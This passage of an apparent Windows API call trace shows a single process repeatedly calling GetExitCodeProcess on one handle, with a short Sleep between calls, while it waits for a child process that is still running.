lpExitCode=0x19ff20*=0x103) returned 1 [0101.063] Sleep (dwMilliseconds=0x19) [0101.248] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.249] Sleep (dwMilliseconds=0x19) [0101.287] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.287] Sleep (dwMilliseconds=0x19) [0101.323] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.323] Sleep (dwMilliseconds=0x19) [0101.377] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.378] Sleep (dwMilliseconds=0x19) [0101.422] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.422] Sleep (dwMilliseconds=0x19) [0101.460] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.460] Sleep (dwMilliseconds=0x19) [0101.517] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.517] Sleep (dwMilliseconds=0x19) [0101.600] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.600] Sleep (dwMilliseconds=0x19) [0101.644] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.644] Sleep (dwMilliseconds=0x19) [0101.692] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.692] Sleep (dwMilliseconds=0x19) [0101.738] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.739] Sleep (dwMilliseconds=0x19) [0101.774] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.774] Sleep (dwMilliseconds=0x19) [0101.811] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.811] Sleep (dwMilliseconds=0x19) [0101.848] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.848] Sleep (dwMilliseconds=0x19) [0101.907] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.907] Sleep (dwMilliseconds=0x19) [0101.957] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.957] Sleep (dwMilliseconds=0x19) [0102.001] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.001] Sleep (dwMilliseconds=0x19) [0102.040] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.040] Sleep (dwMilliseconds=0x19) [0102.073] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.074] Sleep (dwMilliseconds=0x19) [0102.283] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.283] Sleep (dwMilliseconds=0x19) [0102.324] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.325] Sleep (dwMilliseconds=0x19) [0102.384] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.384] Sleep (dwMilliseconds=0x19) [0102.444] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.444] Sleep (dwMilliseconds=0x19) [0102.516] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.516] Sleep (dwMilliseconds=0x19) [0102.564] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.564] Sleep (dwMilliseconds=0x19) [0102.593] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.593] Sleep (dwMilliseconds=0x19) [0102.636] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.638] Sleep (dwMilliseconds=0x19) [0102.729] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.729] Sleep (dwMilliseconds=0x19) [0102.780] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.780] Sleep (dwMilliseconds=0x19) [0102.828] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.828] Sleep (dwMilliseconds=0x19) [0102.892] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.892] Sleep (dwMilliseconds=0x19) [0102.937] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.937] Sleep (dwMilliseconds=0x19) [0102.968] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.968] Sleep (dwMilliseconds=0x19) [0103.027] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.027] Sleep (dwMilliseconds=0x19) [0103.223] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.223] Sleep (dwMilliseconds=0x19) [0103.269] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.269] Sleep (dwMilliseconds=0x19) [0103.318] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.319] Sleep (dwMilliseconds=0x19) [0103.399] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.399] Sleep (dwMilliseconds=0x19) [0103.442] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.442] Sleep (dwMilliseconds=0x19) [0103.470] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.470] Sleep (dwMilliseconds=0x19) [0103.515] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.515] Sleep (dwMilliseconds=0x19) [0103.554] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.554] Sleep (dwMilliseconds=0x19) [0103.590] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.590] Sleep (dwMilliseconds=0x19) [0103.632] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.632] Sleep (dwMilliseconds=0x19) [0103.688] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.688] Sleep (dwMilliseconds=0x19) [0103.761] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.762] Sleep (dwMilliseconds=0x19) [0103.802] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.802] Sleep (dwMilliseconds=0x19) [0103.856] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.856] Sleep (dwMilliseconds=0x19) [0103.890] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.890] Sleep (dwMilliseconds=0x19) [0103.919] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.919] Sleep (dwMilliseconds=0x19) [0103.955] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.955] Sleep (dwMilliseconds=0x19) [0104.083] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.084] Sleep (dwMilliseconds=0x19) [0104.114] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.114] Sleep (dwMilliseconds=0x19) [0104.175] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.175] Sleep (dwMilliseconds=0x19) [0104.214] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.214] Sleep (dwMilliseconds=0x19) [0104.260] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.260] Sleep (dwMilliseconds=0x19) [0104.296] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.296] Sleep (dwMilliseconds=0x19) [0104.370] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.370] Sleep (dwMilliseconds=0x19) [0104.410] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.410] Sleep (dwMilliseconds=0x19) [0104.442] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.442] Sleep (dwMilliseconds=0x19) [0104.476] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.476] Sleep (dwMilliseconds=0x19) [0104.532] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.532] Sleep (dwMilliseconds=0x19) [0104.577] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.577] Sleep (dwMilliseconds=0x19) [0104.621] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.621] Sleep (dwMilliseconds=0x19) [0104.713] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.713] Sleep (dwMilliseconds=0x19) [0104.759] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.759] Sleep (dwMilliseconds=0x19) [0104.802] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.802] Sleep (dwMilliseconds=0x19) [0104.831] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.831] Sleep (dwMilliseconds=0x19) [0104.867] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.867] Sleep (dwMilliseconds=0x19) [0104.901] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.901] Sleep (dwMilliseconds=0x19) [0105.022] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.022] Sleep (dwMilliseconds=0x19) [0105.078] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.078] Sleep (dwMilliseconds=0x19) [0105.118] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.118] Sleep (dwMilliseconds=0x19) [0105.153] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.154] Sleep (dwMilliseconds=0x19) [0105.202] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.202] Sleep (dwMilliseconds=0x19) [0105.264] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.264] Sleep (dwMilliseconds=0x19) [0105.345] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.345] Sleep (dwMilliseconds=0x19) [0105.382] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.382] Sleep (dwMilliseconds=0x19) [0105.417] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.417] Sleep (dwMilliseconds=0x19) [0105.702] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.702] Sleep (dwMilliseconds=0x19) [0105.867] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.869] Sleep (dwMilliseconds=0x19) [0105.945] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.963] Sleep (dwMilliseconds=0x19) [0106.018] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.019] Sleep (dwMilliseconds=0x19) [0106.057] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.057] Sleep (dwMilliseconds=0x19) [0106.209] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.209] Sleep (dwMilliseconds=0x19) [0106.239] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.239] Sleep (dwMilliseconds=0x19) [0106.275] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.275] Sleep (dwMilliseconds=0x19) [0106.325] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.326] Sleep (dwMilliseconds=0x19) [0106.381] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.381] Sleep (dwMilliseconds=0x19) [0106.426] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.426] Sleep (dwMilliseconds=0x19) [0106.476] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.476] Sleep (dwMilliseconds=0x19) [0106.528] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.528] Sleep (dwMilliseconds=0x19) [0106.602] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.602] Sleep (dwMilliseconds=0x19) [0106.629] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.629] Sleep (dwMilliseconds=0x19) [0106.663] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.663] Sleep (dwMilliseconds=0x19) [0106.701] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.701] Sleep (dwMilliseconds=0x19) [0106.777] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.777] Sleep (dwMilliseconds=0x19) [0106.807] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.807] Sleep (dwMilliseconds=0x19) [0106.864] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.864] Sleep (dwMilliseconds=0x19) [0106.906] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.906] Sleep (dwMilliseconds=0x19) [0106.971] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.971] Sleep (dwMilliseconds=0x19) [0107.033] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.033] Sleep (dwMilliseconds=0x19) [0107.109] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.109] Sleep (dwMilliseconds=0x19) [0107.317] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.317] Sleep (dwMilliseconds=0x19) [0107.375] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.375] Sleep (dwMilliseconds=0x19) [0107.405] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.405] Sleep (dwMilliseconds=0x19) [0107.436] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.436] Sleep (dwMilliseconds=0x19) [0107.468] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.468] Sleep (dwMilliseconds=0x19) [0107.515] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.515] Sleep (dwMilliseconds=0x19) [0108.561] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.562] Sleep (dwMilliseconds=0x19) [0108.599] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.599] Sleep (dwMilliseconds=0x19) [0108.640] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.640] Sleep (dwMilliseconds=0x19) [0108.711] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.712] Sleep (dwMilliseconds=0x19) [0108.752] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.752] Sleep (dwMilliseconds=0x19) [0108.821] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.822] Sleep (dwMilliseconds=0x19) [0108.860] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.861] Sleep (dwMilliseconds=0x19) [0108.898] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.898] Sleep (dwMilliseconds=0x19) [0108.933] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.933] Sleep (dwMilliseconds=0x19) [0108.970] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.970] Sleep (dwMilliseconds=0x19) [0109.011] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.011] Sleep (dwMilliseconds=0x19) [0109.065] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.065] Sleep (dwMilliseconds=0x19) [0109.131] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.132] Sleep (dwMilliseconds=0x19) [0109.285] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.285] Sleep (dwMilliseconds=0x19) [0109.334] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.335] Sleep (dwMilliseconds=0x19) [0109.371] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.371] Sleep (dwMilliseconds=0x19) [0109.405] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.406] Sleep (dwMilliseconds=0x19) [0109.447] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.447] Sleep (dwMilliseconds=0x19) [0109.485] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.485] Sleep (dwMilliseconds=0x19) [0109.558] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.558] Sleep (dwMilliseconds=0x19) [0109.670] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.670] Sleep (dwMilliseconds=0x19) [0109.828] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.828] Sleep (dwMilliseconds=0x19) [0109.929] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.929] Sleep (dwMilliseconds=0x19) [0110.003] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.003] Sleep (dwMilliseconds=0x19) [0110.041] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.041] Sleep (dwMilliseconds=0x19) [0110.108] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.109] Sleep (dwMilliseconds=0x19) [0110.228] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.228] Sleep (dwMilliseconds=0x19) [0110.320] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.320] Sleep (dwMilliseconds=0x19) [0110.358] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.358] Sleep (dwMilliseconds=0x19) [0110.393] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.393] Sleep (dwMilliseconds=0x19) [0110.476] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.476] Sleep (dwMilliseconds=0x19) [0110.532] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.532] Sleep (dwMilliseconds=0x19) [0110.572] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.572] Sleep (dwMilliseconds=0x19) [0110.662] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.662] Sleep (dwMilliseconds=0x19) [0110.722] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.722] Sleep (dwMilliseconds=0x19) [0110.792] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.792] Sleep (dwMilliseconds=0x19) [0110.886] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.888] Sleep (dwMilliseconds=0x19) [0111.110] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.110] Sleep (dwMilliseconds=0x19) [0111.320] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.320] Sleep (dwMilliseconds=0x19) [0111.357] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.357] Sleep (dwMilliseconds=0x19) [0111.541] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.541] Sleep (dwMilliseconds=0x19) [0111.620] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.620] Sleep (dwMilliseconds=0x19) [0111.665] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.665] Sleep (dwMilliseconds=0x19) [0111.703] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.703] Sleep (dwMilliseconds=0x19) [0111.741] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.741] Sleep (dwMilliseconds=0x19) [0111.777] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.777] Sleep (dwMilliseconds=0x19) [0111.846] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.846] Sleep (dwMilliseconds=0x19) [0111.917] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.917] Sleep (dwMilliseconds=0x19) [0112.015] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.015] Sleep (dwMilliseconds=0x19) [0112.101] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.101] Sleep (dwMilliseconds=0x19) [0112.277] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.278] Sleep (dwMilliseconds=0x19) [0112.357] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 